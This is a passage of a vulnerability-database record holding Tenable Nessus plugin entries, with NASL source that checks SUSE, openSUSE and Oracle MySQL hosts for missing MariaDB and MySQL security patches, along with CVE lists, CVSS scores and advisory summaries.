owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-debugsource-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-errormessages-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"mariadb-tools-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", 
reference:\"libmysqlclient_r18-32bit-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.22-3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.22-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:29:55", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 19, "cvss3": {"score": 6.2, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": 
"2016-02-08T00:00:00", "title": "openSUSE Security Update : mariadb (openSUSE-2016-164)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-5969", "CVE-2015-4792", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-02-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mariadb-errormessages", "p-cpe:/a:novell:opensuse:mariadb-client", "p-cpe:/a:novell:opensuse:libmysqld-devel", "p-cpe:/a:novell:opensuse:mariadb-tools", "p-cpe:/a:novell:opensuse:mariadb-test-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18", "p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:mariadb-debugsource", "p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit", "p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mariadb-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient_r18", "p-cpe:/a:novell:opensuse:mariadb-client-debuginfo", "p-cpe:/a:novell:opensuse:libmysqld18-debuginfo", "p-cpe:/a:novell:opensuse:mariadb", "p-cpe:/a:novell:opensuse:mariadb-test", "p-cpe:/a:novell:opensuse:libmysqlclient18-32bit", "p-cpe:/a:novell:opensuse:mariadb-bench", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo", "p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit"], "id": "OPENSUSE-2016-164.NASL", "href": "https://www.tenable.com/plugins/nessus/88615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-164.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88615);\n script_version(\"2.6\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4807\", \"CVE-2015-4815\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4913\", \"CVE-2015-5969\");\n\n script_name(english:\"openSUSE Security Update : mariadb (openSUSE-2016-164)\");\n script_summary(english:\"Check for the openSUSE-2016-164 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - Fix information leak via mysql-systemd-helper script.\n (CVE-2015-5969, bsc#957174)\n\nFor a comprehensive list of changes refer to the upstream Release\nNotes and Change Log documents :\n\n- https://kb.askmonty.org/en/mariadb-10022-release-notes/\n\n- https://kb.askmonty.org/en/mariadb-10022-changelog/\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=937787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=957174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958789\"\n );\n # https://kb.askmonty.org/en/mariadb-10022-changelog/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-changelog/\"\n );\n # 
https://kb.askmonty.org/en/mariadb-10022-release-notes/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://mariadb.com/kb/en/library/mariadb-10022-release-notes/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mariadb packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient18-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqld18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-bench-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient-devel-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient18-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqlclient_r18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld-devel-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libmysqld18-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-bench-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-10.0.22-3.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE42.1\", reference:\"mariadb-client-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-debugsource-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-errormessages-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-test-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"mariadb-tools-debuginfo-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient18 / libmysqlclient18-32bit / etc\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2020-06-04T19:09:43", "description": "The version of Oracle MySQL installed on the remote host is 5.5.x\nprior to 5.5.46. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists in the Types subcomponent.\n An authenticated, remote attacker can exploit this to\n gain access to sensitive information. (CVE-2015-4826)\n\n - An unspecified flaw exists in the Security:Privileges\n subcomponent. 
An authenticated, remote attacker can\n exploit this to impact integrity. (CVE-2015-4830)\n\n - An unspecified flaw exists in the Security:Encryption\n subcomponent. An unauthenticated, remote attacker can\n exploit this to gain access to sensitive information.\n (CVE-2015-7744)\n\n - An unspecified flaw exists in the Options subcomponent\n that allows a local attacker to gain elevated\n privileges. (CVE-2016-3471)\n\nAdditionally, unspecified denial of service vulnerabilities exist in\nthe following MySQL subcomponents :\n\n - DDL (CVE-2015-4815)\n\n - DML (CVE-2015-4858, CVE-2015-4913)\n\n - InnoDB (CVE-2015-4861)\n\n - Parser (CVE-2015-4870)\n\n - Partition (CVE-2015-4792, CVE-2015-4802)\n\n - SP (CVE-2015-4836)", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H"}, "published": "2015-10-29T00:00:00", "title": "Oracle MySQL 5.5.x < 5.5.46 Multiple Vulnerabilities (October 2015 CPU) (January 2016 CPU) (July 2016 CPU)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2016-3471", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-7744"], "modified": "2015-10-29T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:mysql", "cpe:/a:oracle:mysql", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:oracle:linux:mysql", "p-cpe:/a:fermilab:scientific_linux:mysql", "p-cpe:/a:fedoraproject:fedora:mysql", "p-cpe:/a:centos:centos:mysql", "p-cpe:/a:redhat:enterprise_linux:mysql", "p-cpe:/a:amazon:linux:mysql"], "id": "MYSQL_5_5_46_RPM.NASL", "href": "https://www.tenable.com/plugins/nessus/86658", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86658);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/03\");\n\n script_cve_id(\n \"CVE-2015-4792\",\n \"CVE-2015-4802\",\n 
\"CVE-2015-4815\",\n \"CVE-2015-4826\",\n \"CVE-2015-4830\",\n \"CVE-2015-4836\",\n \"CVE-2015-4858\",\n \"CVE-2015-4861\",\n \"CVE-2015-4870\",\n \"CVE-2015-4913\",\n \"CVE-2015-7744\",\n \"CVE-2016-3471\"\n );\n script_bugtraq_id(\n 77137,\n 77145,\n 77153,\n 77165,\n 77171,\n 77190,\n 77208,\n 77222,\n 77228,\n 77237,\n 91913\n );\n\n script_name(english:\"Oracle MySQL 5.5.x < 5.5.46 Multiple Vulnerabilities (October 2015 CPU) (January 2016 CPU) (July 2016 CPU)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle MySQL installed on the remote host is 5.5.x\nprior to 5.5.46. It is, therefore, affected by the following\nvulnerabilities :\n\n - An unspecified flaw exists in the Types subcomponent.\n An authenticated, remote attacker can exploit this to\n gain access to sensitive information. (CVE-2015-4826)\n\n - An unspecified flaw exists in the Security:Privileges\n subcomponent. An authenticated, remote attacker can\n exploit this to impact integrity. (CVE-2015-4830)\n\n - An unspecified flaw exists in the Security:Encryption\n subcomponent. An unauthenticated, remote attacker can\n exploit this to gain access to sensitive information.\n (CVE-2015-7744)\n\n - An unspecified flaw exists in the Options subcomponent\n that allows a local attacker to gain elevated\n privileges. 
(CVE-2016-3471)\n\nAdditionally, unspecified denial of service vulnerabilities exist in\nthe following MySQL subcomponents :\n\n - DDL (CVE-2015-4815)\n\n - DML (CVE-2015-4858, CVE-2015-4913)\n\n - InnoDB (CVE-2015-4861)\n\n - Parser (CVE-2015-4870)\n\n - Partition (CVE-2015-4792, CVE-2015-4802)\n\n - SP (CVE-2015-4836)\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368795.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1de82df5\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/2368796.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?10ceb1c6\");\n # http://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3089849.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?42cde00c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/epmos/faces/DocumentDisplay?id=2048227.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2096144.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2157431.1\");\n # http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?75a4a4fb\");\n # https://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d13bbe45\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?453b5f8c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL version 5.5.46 or later.\");\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3471\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/29\");\n\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mysql\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Databases\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\");\n script_require_ports(\"Host/RedHat/release\", \"Host/AmazonLinux/release\", \"Host/SuSE/release\", \"Host/CentOS/release\");\n\n exit(0);\n}\n\ninclude(\"mysql_version.inc\");\n\nfix_version = \"5.5.46\";\nexists_version = \"5.5\";\n\nmysql_check_rpms(mysql_packages:default_mysql_rpm_list_server_only, fix_ver:fix_version, exists_ver:exists_version, rhel_os_list:default_mysql_rhel_os_list, centos_os_list:default_mysql_centos_os_list, suse_os_list:default_mysql_suse_os_list, ala_os_list:default_mysql_ala_os_list, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:26", "description": "MariaDB has been updated to version 10.0.22, which brings fixes for\nmany security issues and other improvements.\n\nThe following CVEs have been fixed :\n\n - 10.0.22: CVE-2015-4802, CVE-2015-4807, CVE-2015-4815,\n CVE-2015-4826, CVE-2015-4830, CVE-2015-4836,\n CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\n CVE-2015-4913, CVE-2015-4792\n\n - 10.0.21: CVE-2015-4816, CVE-2015-4819, CVE-2015-4879,\n CVE-2015-4895\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2016-01-18T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : mariadb (SUSE-SU-2016:0121-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4807", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2016-01-18T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:mariadb-errormessages", "p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo", "p-cpe:/a:novell:suse_linux:libmysqlclient_r18", "p-cpe:/a:novell:suse_linux:mariadb-client", "p-cpe:/a:novell:suse_linux:mariadb-debugsource", "p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb", "p-cpe:/a:novell:suse_linux:mariadb-debuginfo", "p-cpe:/a:novell:suse_linux:mariadb-tools", "p-cpe:/a:novell:suse_linux:libmysqlclient18", "p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo"], "id": "SUSE_SU-2016-0121-1.NASL", "href": "https://www.tenable.com/plugins/nessus/87964", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0121-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87964);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", 